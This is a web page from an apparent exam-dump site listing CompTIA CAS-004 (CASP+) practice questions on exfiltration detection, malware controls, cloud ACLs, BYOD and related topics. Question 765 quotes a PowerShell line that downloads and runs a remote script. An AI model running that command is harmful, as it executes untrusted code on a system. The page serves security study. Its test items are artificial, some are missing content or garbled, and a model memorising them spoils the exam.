CAS-004 Exam Details

  • Exam Code
    :CAS-004
  • Exam Name
    :CompTIA Advanced Security Practitioner (CASP+)
  • Certification
    :CompTIA Certifications
  • Vendor
    :CompTIA
  • Total Questions
    :792 Q&As
  • Last Updated
    :Jul 09, 2026

CompTIA CAS-004 Online Questions & Answers

  • Question 761:

    A security analyst is reviewing the data portion acquired from the following command:

    tcpdump -lnvi icmp and src net 192.168.1.0/24 and dst net 0.0.0.0/0 -w output.pcap

    The data portion of the packet capture shows the following:

    The analyst suspects that a data exfiltration attack is occurring using a pattern in which the last five digits are encoding sensitive information. Which of the following technologies and associated rules should the analyst implement to stop this specific attack? (Choose two.)

    A. Intrusion prevention system
    B. Data loss prevention
    C. sed -e 's/a-z.*0-9.*//g'
    D. reject icmp any any any any (msg:"alert"; regex [a-z]{26}[0-9]{5})
    E. Second-generation firewall
    F. drop icmp from 192.168.1.0/24 to 0.0.0.0/0

  • Question 762:

    The Chief Information Security Officer is concerned about the possibility of employees downloading malicious files from the internet and opening them on corporate workstations. Which of the following solutions would be BEST to reduce this risk?

    A. Integrate the web proxy with threat intelligence feeds.
    B. Scan all downloads using an antivirus engine on the web proxy.
    C. Block known malware sites on the web proxy.
    D. Execute the files in the sandbox on the web proxy.

  • Question 763:

    In comparison with traditional on-premises infrastructure configurations, defining ACLs in a CSP relies on:

    A. cloud-native applications.
    B. containerization.
    C. serverless configurations.
    D. software-defined networking.
    E. secure access service edge.

  • Question 764:

    An ASIC manufacturer wishing to best reduce downstream supply chain risk can provide validation instructions for consumers that:

    A. Leverage physically uncloneable functions.
    B. Analyze an emplaced holographic icon on the board.
    C. Include schematics traceable via X-ray interrogation.
    D. Incorporate MD5 hashes of the ASIC design file.

  • Question 765:

    A security analyst has noticed a steady increase in the number of failed login attempts to the external-facing mail server. During an investigation of one of the jump boxes, the analyst identified the following in the log file:

    powershell "IEX(New-Object Net.WebClient).DownloadString (`https://content.comptia.org/casp/whois.psl');whois"

    Which of the following security controls would have alerted and prevented the next phase of the attack?

    A. Antivirus and UEBA
    B. Reverse proxy and sandbox
    C. EDR and application approved list
    D. Forward proxy and MFA

  • Question 766:

    A company provides guest WiFi access to the Internet and physically separates the guest network from the company's internal WiFi. Due to a recent incident in which an attacker gained access to the company's internal WiFi, the company

    plans to configure WPA2 Enterprise in an EAP-TLS configuration.

    Which of the following must be installed on authorized hosts for this new configuration to work properly?

    A. Active Directory GPOs
    B. PKI certificates
    C. Host-based firewall
    D. NAC persistent agent

  • Question 767:

    An organization's finance system was recently attacked. A forensic analyst is reviewing the contents of the compromised files for credit card data. Which of the following commands should

    the analyst run to BEST determine whether financial data was lost?

    A. Option A
    B. Option B
    C. Option C
    D. Option D

  • Question 768:

    A company has a BYOD policy and has configured remote-wiping capabilities to support security requirements. An executive has raised concerns about personal contacts and photos being deleted from personal devices when an employee is terminated.

    Which of the following is the best way to address these concerns?

    A. Enforce the use of the approved email client.
    B. Require full device encryption.
    C. Disable geotagging on the devices.
    D. Implement containerization.

  • Question 769:

    A technician is reviewing the logs and notices a large number of files were transferred to remote sites over the course of three months. This activity then stopped. The files were transferred via TLS-protected HTTP sessions from systems that do not send traffic to those sites.

    The technician will define this threat as:

    A. a decrypting RSA using obsolete and weakened encryption attack.
    B. a zero-day attack.
    C. an advanced persistent threat.
    D. an on-path attack.

  • Question 770:

    A security is assisting the marketing department with ensuring the security of the organization's social media platforms. The two main concerns are:

    1.The Chief marketing officer (CMO) email is being used department wide as the username

    2.The password has been shared within the department

    Which of the following controls would be BEST for the analyst to recommend?

    A. Configure MFA for all users to decrease their reliance on other authentication.
    B. Have periodic, scheduled reviews to determine which OAuth configuration are set for each media platform.
    C. Create multiple social media accounts for all marketing user to separate their actions.
    D. Ensue the password being shared is sufficiently and not written down anywhere.

Tips on How to Prepare for the Exams

Nowadays, the certification exams become more and more important and required by more and more enterprises when applying for a job. But how to prepare for the exam effectively? How to prepare for the exam in a short time with less efforts? How to get a ideal result and how to find the most reliable resources? Here on Vcedump.com, you will find all the answers. Vcedump.com provide not only CompTIA exam questions, answers and explanations but also complete assistance on your exam preparation and certification application. If you are confused on your CAS-004 exam preparations and CompTIA certification application, do not hesitate to visit our Vcedump.com to find your solutions here.